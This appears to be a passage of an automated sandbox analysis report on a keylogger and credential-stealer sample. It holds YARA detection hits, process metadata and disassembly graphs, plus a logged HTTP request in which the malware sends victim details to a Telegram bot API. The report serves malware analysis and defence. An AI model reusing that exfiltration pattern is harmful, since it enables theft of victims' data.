                                                                                          2025-01-06 06:41:25 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          8192.168.2.749790149.154.167.2204437432C:\Users\user\Desktop\kP8EgMorTr.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-06 06:41:26 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20and%20Time:%2006/01/2025%20/%2020:38:20%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20927537%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                          Host: api.telegram.org
                                                                                          Connection: Keep-Alive
                                                                                          2025-01-06 06:41:26 UTC344INHTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.18.0
                                                                                          Date: Mon, 06 Jan 2025 06:41:26 GMT
                                                                                          Content-Type: application/json
                                                                                          Content-Length: 55
                                                                                          Connection: close
                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                          Access-Control-Allow-Origin: *
                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                          2025-01-06 06:41:26 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                          Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                          Statistics

                                                                                          CPU Usage

                                                                                          Click to jump to process

                                                                                          Memory Usage

                                                                                          Click to jump to process

                                                                                          High Level Behavior Distribution

                                                                                          Click to dive into process behavior distribution

                                                                                          Behavior

                                                                                          Click to jump to process

                                                                                          System Behavior

                                                                                          General

                                                                                          Target ID:0
                                                                                          Start time:01:41:03
                                                                                          Start date:06/01/2025
                                                                                          Path:C:\Users\user\Desktop\kP8EgMorTr.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\Desktop\kP8EgMorTr.exe"
                                                                                          Imagebase:0x260000
                                                                                          File size:781'312 bytes
                                                                                          MD5 hash:8A51BDA9C0CD3D8519C1156DFA39426B
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1254420339.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:3
                                                                                          Start time:01:41:04
                                                                                          Start date:06/01/2025
                                                                                          Path:C:\Users\user\Desktop\kP8EgMorTr.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\Desktop\kP8EgMorTr.exe"
                                                                                          Imagebase:0xf50000
                                                                                          File size:781'312 bytes
                                                                                          MD5 hash:8A51BDA9C0CD3D8519C1156DFA39426B
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.3699670660.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:low
                                                                                          Has exited:false

                                                                                          Disassembly

                                                                                          Reset < >

                                                                                            Execution Graph

                                                                                            Execution Coverage:12.2%
                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                            Signature Coverage:2.4%
                                                                                            Total number of Nodes:126
                                                                                            Total number of Limit Nodes:11
                                                                                            execution_graph 37049 6d06e00 37050 6d06e3a 37049->37050 37051 6d06eb6 37050->37051 37052 6d06ecb 37050->37052 37057 6d051fc 37051->37057 37054 6d051fc 3 API calls 37052->37054 37055 6d06eda 37054->37055 37059 6d05207 37057->37059 37058 6d06ec1 37059->37058 37062 6d07810 37059->37062 37069 6d07820 37059->37069 37063 6d07813 37062->37063 37075 6d05244 37063->37075 37066 6d07847 37066->37058 37067 6d0785f CreateIconFromResourceEx 37068 6d078ee 37067->37068 37068->37058 37070 6d05244 CreateIconFromResourceEx 37069->37070 37071 6d0783a 37070->37071 37072 6d07847 37071->37072 37073 6d0785f CreateIconFromResourceEx 37071->37073 37072->37058 37074 6d078ee 37073->37074 37074->37058 37076 6d07870 CreateIconFromResourceEx 37075->37076 37077 6d0783a 37076->37077 37077->37066 37077->37067 37090 6d02130 37094 6d02158 37090->37094 37098 6d02168 37090->37098 37091 6d0214f 37095 6d02168 37094->37095 37102 6d021a0 37095->37102 37096 6d02196 37096->37091 37099 6d02171 37098->37099 37101 6d021a0 DrawTextExW 37099->37101 37100 6d02196 37100->37091 37101->37100 37103 6d021da 37102->37103 37104 6d021eb 37102->37104 37103->37096 37105 6d02278 37104->37105 37108 6d02478 37104->37108 37113 6d02468 37104->37113 37105->37096 37109 6d024a0 37108->37109 37110 6d025a5 37109->37110 37118 6d04738 37109->37118 37123 6d04728 37109->37123 37110->37103 37114 6d02478 37113->37114 37115 6d025a5 37114->37115 37116 6d04738 DrawTextExW 37114->37116 37117 6d04728 DrawTextExW 37114->37117 37115->37103 37116->37115 37117->37115 37119 6d0474e 37118->37119 37128 6d04ba0 37119->37128 37132 6d04b91 37119->37132 37120 6d047c4 37120->37110 37124 6d04738 37123->37124 37126 6d04ba0 DrawTextExW 37124->37126 37127 6d04b91 DrawTextExW 37124->37127 37125 6d047c4 37125->37110 37126->37125 37127->37125 37129 6d04bbe 37128->37129 37136 6d04be0 37128->37136 37141 6d04bd1 37128->37141 37129->37120 37134 6d04be0 DrawTextExW 37132->37134 37135 6d04bd1 DrawTextExW 37132->37135 37133 6d04bbe 37133->37120 37134->37133 37135->37133 37137 6d04c11 37136->37137 37138 6d04c3e 37137->37138 37146 6d04c60 37137->37146 37151 6d04c51 37137->37151 37138->37129 37142 6d04be0 37141->37142 37143 6d04c3e 37142->37143 37144 6d04c60 DrawTextExW 37142->37144 37145 6d04c51 DrawTextExW 37142->37145 37143->37129 37144->37143 37145->37143 37148 6d04c81 37146->37148 37147 6d04c96 37147->37138 37148->37147 37156 6d03304 37148->37156 37150 6d04cf1 37153 6d04c81 37151->37153 37152 6d04c96 37152->37138 37153->37152 37154 6d03304 DrawTextExW 37153->37154 37155 6d04cf1 37154->37155 37158 6d0330f 37156->37158 37157 6d05481 37157->37150 37158->37157 37162 6d05ad8 37158->37162 37165 6d05ac8 37158->37165 37159 6d05593 37159->37150 37169 6d050dc 37162->37169 37166 6d05ad8 37165->37166 37167 6d050dc DrawTextExW 37166->37167 37168 6d05af5 37167->37168 37168->37159 37170 6d05b10 DrawTextExW 37169->37170 37172 6d05af5 37170->37172 37172->37159 37078 9fd7c8 DuplicateHandle 37079 9fd85e 37078->37079 37173 9fb1f8 37176 9fb2df 37173->37176 37174 9fb207 37177 9fb324 37176->37177 37178 9fb301 37176->37178 37177->37174 37178->37177 37179 9fb528 GetModuleHandleW 37178->37179 37180 9fb555 37179->37180 37180->37174 37185 9f4668 37186 9f467a 37185->37186 37187 9f4686 37186->37187 37189 9f4778 37186->37189 37190 9f479d 37189->37190 37194 9f4888 37190->37194 37198 9f4877 37190->37198 37196 9f48af 37194->37196 37195 9f498c 37195->37195 37196->37195 37202 9f44b4 37196->37202 37199 9f48af 37198->37199 37200 9f44b4 CreateActCtxA 37199->37200 37201 9f498c 37199->37201 37200->37201 37203 9f5918 CreateActCtxA 37202->37203 37205 9f59db 37203->37205 37205->37205 37047 4bf3ef1 CloseHandle 37048 4bf3f5f 37047->37048 37080 9fd580 37081 9fd5c6 GetCurrentProcess 37080->37081 37083 9fd618 GetCurrentThread 37081->37083 37084 9fd611 37081->37084 37085 9fd64e 37083->37085 37086 9fd655 GetCurrentProcess 37083->37086 37084->37083 37085->37086 37089 9fd68b 37086->37089 37087 9fd6b3 GetCurrentThreadId 37088 9fd6e4 37087->37088 37089->37087 37181 4bf4e50 37182 4bf4e93 37181->37182 37183 4bf4ee2 37182->37183 37184 4bf4eb1 MonitorFromPoint 37182->37184 37184->37183

                                                                                            Executed Functions

                                                                                            Function 06D0B688 Relevance: 6.0, Strings: 4, Instructions: 1029COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 339 6d0b688-6d0b6a9 340 6d0b6b0-6d0b79c 339->340 341 6d0b6ab 339->341 343 6d0b7a2-6d0b8f6 340->343 344 6d0bfc9-6d0bff1 340->344 341->340 388 6d0bf97-6d0bfc6 343->388 389 6d0b8fc-6d0b957 343->389 347 6d0c6d3-6d0c6dc 344->347 349 6d0c6e2-6d0c6f9 347->349 350 6d0bfff-6d0c008 347->350 352 6d0c00a 350->352 353 6d0c00f-6d0c0e8 350->353 352->353 510 6d0c0ee call 6d0c938 353->510 511 6d0c0ee call 6d0c928 353->511 369 6d0c0f4-6d0c101 370 6d0c103-6d0c10f 369->370 371 6d0c12b 369->371 373 6d0c111-6d0c117 370->373 374 6d0c119-6d0c11f 370->374 375 6d0c131-6d0c150 371->375 376 6d0c129 373->376 374->376 380 6d0c1b0-6d0c228 375->380 381 6d0c152-6d0c1ab 375->381 376->375 400 6d0c22a-6d0c27d 380->400 401 6d0c27f-6d0c2c2 380->401 393 6d0c6d0 381->393 388->344 395 6d0b959 389->395 396 6d0b95c-6d0b967 389->396 393->347 395->396 399 6d0beab-6d0beb1 396->399 402 6d0beb7-6d0bf34 399->402 403 6d0b96c-6d0b98a 399->403 428 6d0c2cd-6d0c2d3 400->428 401->428 446 6d0bf81-6d0bf87 402->446 405 6d0b9e1-6d0b9f6 403->405 406 6d0b98c-6d0b990 403->406 411 6d0b9f8 405->411 412 6d0b9fd-6d0ba13 405->412 406->405 410 6d0b992-6d0b99d 406->410 415 6d0b9d3-6d0b9d9 410->415 411->412 413 6d0ba15 412->413 414 6d0ba1a-6d0ba31 412->414 413->414 418 6d0ba33 414->418 419 6d0ba38-6d0ba4e 414->419 421 6d0b9db-6d0b9dc 415->421 422 6d0b99f-6d0b9a3 415->422 418->419 426 6d0ba50 419->426 427 6d0ba55-6d0ba5c 419->427 429 6d0ba5f-6d0bad0 421->429 424 6d0b9a5 422->424 425 6d0b9a9-6d0b9c1 422->425 424->425 431 6d0b9c3 425->431 432 6d0b9c8-6d0b9d0 425->432 426->427 427->429 433 6d0c32a-6d0c336 428->433 434 6d0bad2 429->434 435 6d0bae6-6d0bc5e 429->435 431->432 432->415 436 6d0c2d5-6d0c2f7 433->436 437 6d0c338-6d0c3bf 433->437 434->435 438 6d0bad4-6d0bae0 434->438 443 6d0bc60 435->443 444 6d0bc74-6d0bdaf 435->444 441 6d0c2f9 436->441 442 6d0c2fe-6d0c327 436->442 468 6d0c544-6d0c54d 437->468 438->435 441->442 442->433 443->444 447 6d0bc62-6d0bc6e 443->447 457 6d0bdb1-6d0bdb5 444->457 458 6d0be13-6d0be28 444->458 448 6d0bf36-6d0bf7e 446->448 449 6d0bf89-6d0bf8f 446->449 447->444 448->446 449->388 457->458 462 6d0bdb7-6d0bdc6 457->462 460 6d0be2a 458->460 461 6d0be2f-6d0be50 458->461 460->461 465 6d0be52 461->465 466 6d0be57-6d0be76 461->466 467 6d0be05-6d0be0b 462->467 465->466 473 6d0be78 466->473 474 6d0be7d-6d0be9d 466->474 469 6d0bdc8-6d0bdcc 467->469 470 6d0be0d-6d0be0e 467->470 471 6d0c553-6d0c5ae 468->471 472 6d0c3c4-6d0c3d9 468->472 476 6d0bdd6-6d0bdf7 469->476 477 6d0bdce-6d0bdd2 469->477 475 6d0bea8 470->475 496 6d0c5b0-6d0c5e3 471->496 497 6d0c5e5-6d0c60f 471->497 478 6d0c3e2-6d0c538 472->478 479 6d0c3db 472->479 473->474 480 6d0bea4 474->480 481 6d0be9f 474->481 475->399 483 6d0bdf9 476->483 484 6d0bdfe-6d0be02 476->484 477->476 500 6d0c53e 478->500 479->478 485 6d0c472-6d0c4b2 479->485 486 6d0c4b7-6d0c4f7 479->486 487 6d0c3e8-6d0c428 479->487 488 6d0c42d-6d0c46d 479->488 480->475 481->480 483->484 484->467 485->500 486->500 487->500 488->500 505 6d0c618-6d0c6c4 496->505 497->505 500->468 505->393 510->369 511->369
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1255850284.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6d00000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'q$Teq$\ lw$xbq
                                                                                            • API String ID: 0-807568411
                                                                                            • Opcode ID: 43caaa1d3a594bd513f430443e8fb28af4a6d34f070bb41bd0b84b8a9247146e
                                                                                            • Instruction ID: d71c5ee6c6670692f03a34bff2a9511b72225cd50d3acfc0118d45faa731ff8d
                                                                                            • Opcode Fuzzy Hash: 43caaa1d3a594bd513f430443e8fb28af4a6d34f070bb41bd0b84b8a9247146e
                                                                                            • Instruction Fuzzy Hash: 03B2B175E006288FDB64CF69C984BD9BBB2FF89304F1581E9D509AB265DB319E81CF40
                                                                                            Function 04BF8809 Relevance: 5.3, Strings: 1, Instructions: 4066COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 512 4bf8809-4bf8843 513 4bf884a-4bf888c 512->513 514 4bf8845 512->514 519 4bf8896-4bf88a2 call 4bf85f4 513->519 514->513 521 4bf88a7-4bf8954 call 4bf8604 call 4bf8614 call 4bf8624 519->521 535 4bf895e-4bf896a call 4bf8634 521->535 537 4bf896f-4bf8ab2 call 4bf8624 call 4bf8634 call 4bf8644 call 4bf8654 * 3 535->537 563 4bf8abc-4bf8ac8 call 4bf8664 537->563 565 4bf8acd-4bf8f26 call 4bf8604 call 4bf8654 * 3 call 4bf8664 call 4bf8604 call 4bf8634 * 4 call 4bf8654 * 3 call 4bf8664 call 4bf8654 * 3 563->565 647 4bf8f2d-4bf8f41 565->647 648 4bf8f47-4bf905f call 4bf8674 647->648 658 4bf9066-4bf9077 call 4bf8684 648->658 660 4bf907c-4bf90d5 call 4bf8694 658->660 664 4bf90da-4bf90e7 660->664 665 4bf90ee-4bf919f 664->665 673 4bf91a6-4bf91ba 665->673 674 4bf91c0-4bf9366 call 4bf86a4 call 4bf33b0 call 4bf86b4 673->674 687 4bf936b-4bf9380 674->687 1267 4bf9383 call 4bfd881 687->1267 1268 4bf9383 call 4bfd890 687->1268 688 4bf9385-4bf93d9 call 4bf86c4 694 4bf93e4-4bf93fa 688->694 695 4bf9403-4bf9423 694->695 697 4bf942a-4bf944f 695->697 698 4bf9425 695->698 700 4bf9456-4bf9493 697->700 701 4bf9451 697->701 698->697 704 4bf949a-4bf94d7 700->704 705 4bf9495 700->705 701->700 708 4bf94de-4bf95a8 704->708 709 4bf94d9 704->709 705->704 717 4bf95b3-4bf95d1 708->717 709->708 718 4bf95dc-4bf95e8 717->718 719 4bf95f2-4bf95fa 718->719 720 4bf9600-4bf9610 719->720 721 4bf9617-4bf963d 720->721 722 4bf9612 720->722 724 4bf9644-4bf965e 721->724 722->721 725 4bf9664-4bf96a5 724->725 728 4bf96ac-4bf96c6 725->728 729 4bf96cc-4bf9821 call 4bf8674 call 4bf8694 728->729 740 4bf9828-4bf9842 729->740 741 4bf9848-4bf99eb call 4bf8674 call 4bf8694 call 4bf86d4 740->741 755 4bf99f0-4bf99fe 741->755 756 4bf9a04-4bf9a2c 755->756 757 4bf9a37-4bf9a51 call 4bf8674 756->757 759 4bf9a56-4bfa598 call 4bf8694 call 4bf8674 call 4bf8694 call 4bf86d4 call 4bf8674 call 4bf8694 call 4bf8674 call 4bf86e4 call 4bf86f4 call 4bf8704 call 4bf8674 call 4bf8694 call 4bf8714 call 4bf8724 call 4bf8674 call 4bf8694 call 4bf8714 call 4bf8724 call 4bf8674 call 4bf8694 call 4bf8714 call 4bf8724 call 4bf8734 call 4bf8744 call 4bf8754 757->759 865 4bfa59d-4bfa5fc call 4bf8764 call 4bf8774 759->865 871 4bfa602-4bfa6ec call 4bf8674 call 4bf8784 865->871 879 4bfa6f3-4bfa707 call 4bf8794 871->879 881 4bfa70c-4bfa71d call 4bf87a4 879->881 883 4bfa722-4bfa736 call 4bf87b4 881->883 885 4bfa73b-4bfa766 883->885 886 4bfa770-4bfa788 885->886 887 4bfa78f-4bfb60d call 4bf8694 call 4bf87c4 call 4bf86a4 call 4bf33b0 call 4bf86b4 call 4bf86c4 call 4bf8674 call 4bf8694 call 4bf8714 call 4bf8724 call 4bf8674 call 4bf8694 call 4bf8714 call 4bf8724 call 4bf8674 call 4bf8694 call 4bf8714 call 4bf8724 call 4bf8734 call 4bf8744 call 4bf8764 call 4bf8774 call 4bf8674 call 4bf8784 call 4bf8794 call 4bf87a4 call 4bf87b4 call 4bf8694 call 4bf87c4 call 4bf86a4 call 4bf33b0 call 4bf86b4 call 4bf86c4 886->887 1032 4bfb612-4bfb626 887->1032 1033 4bfb62c-4bfcb64 call 4bf8674 call 4bf8694 call 4bf8674 call 4bf8694 call 4bf8674 call 4bf8694 call 4bf8674 call 4bf8694 call 4bf8674 call 4bf8694 call 4bf8714 call 4bf8724 call 4bf8674 call 4bf8694 call 4bf8714 call 4bf8724 call 4bf8674 call 4bf8694 call 4bf8714 call 4bf8724 call 4bf8734 call 4bf8764 call 4bf8774 call 4bf8674 call 4bf8784 call 4bf8794 call 4bf87a4 call 4bf87b4 call 4bf8694 call 4bf86d4 call 4bf8674 call 4bf8694 call 4bf8714 call 4bf8724 call 4bf86d4 call 4bf8674 call 4bf8694 call 4bf8714 call 4bf8724 call 4bf86d4 call 4bf8674 call 4bf8694 call 4bf8714 call 4bf8724 1032->1033 1235 4bfcb8e 1033->1235 1236 4bfcb66-4bfcb72 1033->1236 1237 4bfcb94-4bfccb6 call 4bf87d4 call 4bf87e4 call 4bf87f4 1235->1237 1238 4bfcb7c-4bfcb82 1236->1238 1239 4bfcb74-4bfcb7a 1236->1239 1255 4bfccbd-4bfccca 1237->1255 1241 4bfcb8c 1238->1241 1239->1241 1241->1237 1256 4bfccd1-4bfcd59 1255->1256 1263 4bfcd60-4bfcd6d 1256->1263 1264 4bfcd74-4bfcd9d 1263->1264 1267->688 1268->688
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1252134939.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_4bf0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $Iq
                                                                                            • API String ID: 0-312629932
                                                                                            • Opcode ID: e6aab798c105746260f7c45a648c810a6c3b755ee2746c8461924b86079ee00b
                                                                                            • Instruction ID: 7e4dcd2aaaef5b8379c136eb7b7237a23e0b036dae7f50eda16c7c4a88c641e9
                                                                                            • Opcode Fuzzy Hash: e6aab798c105746260f7c45a648c810a6c3b755ee2746c8461924b86079ee00b
                                                                                            • Instruction Fuzzy Hash: 0B93E774A056198FDB64DF28C884AE9B3B1FF89304F1146E9E50C6B3A0DB35AE85CF51
                                                                                            Function 04BF8818 Relevance: 5.3, Strings: 1, Instructions: 4062COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1269 4bf8818-4bf8843 1270 4bf884a-4bf9380 call 4bf85f4 call 4bf8604 call 4bf8614 call 4bf8624 call 4bf8634 call 4bf8624 call 4bf8634 call 4bf8644 call 4bf8654 * 3 call 4bf8664 call 4bf8604 call 4bf8654 * 3 call 4bf8664 call 4bf8604 call 4bf8634 * 4 call 4bf8654 * 3 call 4bf8664 call 4bf8654 * 3 call 4bf8674 call 4bf8684 call 4bf8694 call 4bf86a4 call 4bf33b0 call 4bf86b4 1269->1270 1271 4bf8845 1269->1271 2024 4bf9383 call 4bfd881 1270->2024 2025 4bf9383 call 4bfd890 1270->2025 1271->1270 1445 4bf9385-4bf9423 call 4bf86c4 1454 4bf942a-4bf944f 1445->1454 1455 4bf9425 1445->1455 1457 4bf9456-4bf9493 1454->1457 1458 4bf9451 1454->1458 1455->1454 1461 4bf949a-4bf94d7 1457->1461 1462 4bf9495 1457->1462 1458->1457 1465 4bf94de-4bf9610 1461->1465 1466 4bf94d9 1461->1466 1462->1461 1478 4bf9617-4bfcb64 call 4bf8674 call 4bf8694 call 4bf8674 call 4bf8694 call 4bf86d4 call 4bf8674 call 4bf8694 call 4bf8674 call 4bf8694 call 4bf86d4 call 4bf8674 call 4bf8694 call 4bf8674 call 4bf86e4 call 4bf86f4 call 4bf8704 call 4bf8674 call 4bf8694 call 4bf8714 call 4bf8724 call 4bf8674 call 4bf8694 call 4bf8714 call 4bf8724 call 4bf8674 call 4bf8694 call 4bf8714 call 4bf8724 call 4bf8734 call 4bf8744 call 4bf8754 call 4bf8764 call 4bf8774 call 4bf8674 call 4bf8784 call 4bf8794 call 4bf87a4 call 4bf87b4 call 4bf8694 call 4bf87c4 call 4bf86a4 call 4bf33b0 call 4bf86b4 call 4bf86c4 call 4bf8674 call 4bf8694 call 4bf8714 call 4bf8724 call 4bf8674 call 4bf8694 call 4bf8714 call 4bf8724 call 4bf8674 call 4bf8694 call 4bf8714 call 4bf8724 call 4bf8734 call 4bf8744 call 4bf8764 call 4bf8774 call 4bf8674 call 4bf8784 call 4bf8794 call 4bf87a4 call 4bf87b4 call 4bf8694 call 4bf87c4 call 4bf86a4 call 4bf33b0 call 4bf86b4 call 4bf86c4 call 4bf8674 call 4bf8694 call 4bf8674 call 4bf8694 call 4bf8674 call 4bf8694 call 4bf8674 call 4bf8694 call 4bf8674 call 4bf8694 call 4bf8714 call 4bf8724 call 4bf8674 call 4bf8694 call 4bf8714 call 4bf8724 call 4bf8674 call 4bf8694 call 4bf8714 call 4bf8724 call 4bf8734 call 4bf8764 call 4bf8774 call 4bf8674 call 4bf8784 call 4bf8794 call 4bf87a4 call 4bf87b4 call 4bf8694 call 4bf86d4 call 4bf8674 call 4bf8694 call 4bf8714 call 4bf8724 call 4bf86d4 call 4bf8674 call 4bf8694 call 4bf8714 call 4bf8724 call 4bf86d4 call 4bf8674 call 4bf8694 call 4bf8714 call 4bf8724 1465->1478 1479 4bf9612 1465->1479 1466->1465 1992 4bfcb8e 1478->1992 1993 4bfcb66-4bfcb72 1478->1993 1479->1478 1994 4bfcb94-4bfcd6d call 4bf87d4 call 4bf87e4 call 4bf87f4 1992->1994 1995 4bfcb7c-4bfcb82 1993->1995 1996 4bfcb74-4bfcb7a 1993->1996 2021 4bfcd74-4bfcd9d 1994->2021 1998 4bfcb8c 1995->1998 1996->1998 1998->1994 2024->1445 2025->1445
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1252134939.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_4bf0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $Iq
                                                                                            • API String ID: 0-312629932
                                                                                            • Opcode ID: 2b7ed54ffa1597600b121e8d42e3f64b32ec23fccfd6975466096e3d04f15032
                                                                                            • Instruction ID: 5d53ecaba4b3471ed3cabdd343cdefa2275a5c0a99b252b174a08954d49dcb91
                                                                                            • Opcode Fuzzy Hash: 2b7ed54ffa1597600b121e8d42e3f64b32ec23fccfd6975466096e3d04f15032
                                                                                            • Instruction Fuzzy Hash: 5593E674A056198FDB64DF28C884AE9B3B1FF89304F1146E9E50C6B3A0DB35AE85CF51
                                                                                            Function 06D00CF8 Relevance: 1.8, Strings: 1, Instructions: 554COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 2151 6d00cf8-6d00d2d 2153 6d00d3a 2151->2153 2154 6d00d2f-6d00d38 2151->2154 2155 6d00d3c-6d00d41 2153->2155 2154->2155 2156 6d00d47-6d00d53 2155->2156 2157 6d00f0b-6d00fd1 call 6d00114 call 6d00124 2155->2157 2158 6d00d59-6d00d6f 2156->2158 2159 6d00efb-6d00f01 2156->2159 2194 6d00fd6-6d01071 call 6d00134 2157->2194 2160 6d00d75-6d00d79 2158->2160 2161 6d00ee7-6d00ef5 2158->2161 2163 6d00d85-6d00d8f 2160->2163 2164 6d00d7b-6d00d7f 2160->2164 2161->2159 2166 6d00d91-6d00da2 2163->2166 2167 6d00dad-6d00dcc 2163->2167 2164->2161 2164->2163 2166->2167 2174 6d00e21-6d00e34 2167->2174 2175 6d00dce-6d00dd9 2167->2175 2177 6d00ecb-6d00eda 2174->2177 2182 6d00df1-6d00df7 2175->2182 2183 6d00ddb-6d00de1 2175->2183 2186 6d00ee4 2177->2186 2187 6d00edc 2177->2187 2188 6d00e00-6d00e04 2182->2188 2189 6d00df9-6d00dfe 2182->2189 2184 6d00de3 2183->2184 2185 6d00de5-6d00de7 2183->2185 2184->2182 2185->2182 2186->2161 2187->2186 2192 6d00e06-6d00e0b 2188->2192 2193 6d00e0d 2188->2193 2191 6d00e0f-6d00e12 2189->2191 2195 6d00e14-6d00e1f 2191->2195 2196 6d00e39-6d00ec3 2191->2196 2192->2191 2193->2191 2203 6d010b1-6d010f8 2194->2203 2204 6d01073-6d010ac 2194->2204 2195->2174 2195->2175 2196->2177 2209 6d011b2-6d011bb 2203->2209 2210 6d010fe-6d011ab 2203->2210 2204->2203 2212 6d011c1-6d01280 2209->2212 2213 6d01287-6d01293 2209->2213 2210->2209 2212->2213 2218 6d01476-6d01486 2213->2218 2219 6d01299-6d012a5 2213->2219 2220 6d01488-6d0148c 2218->2220 2221 6d0149f 2218->2221 2228 6d012e4 2219->2228 2229 6d012a7-6d012b0 call 6d00144 2219->2229 2220->2221 2224 6d0148e-6d01491 2220->2224 2225 6d014a1-6d014a3 2221->2225 2224->2221 2230 6d01493-6d0149d 2224->2230 2226 6d014a5-6d014e8 2225->2226 2227 6d014ef-6d0152f 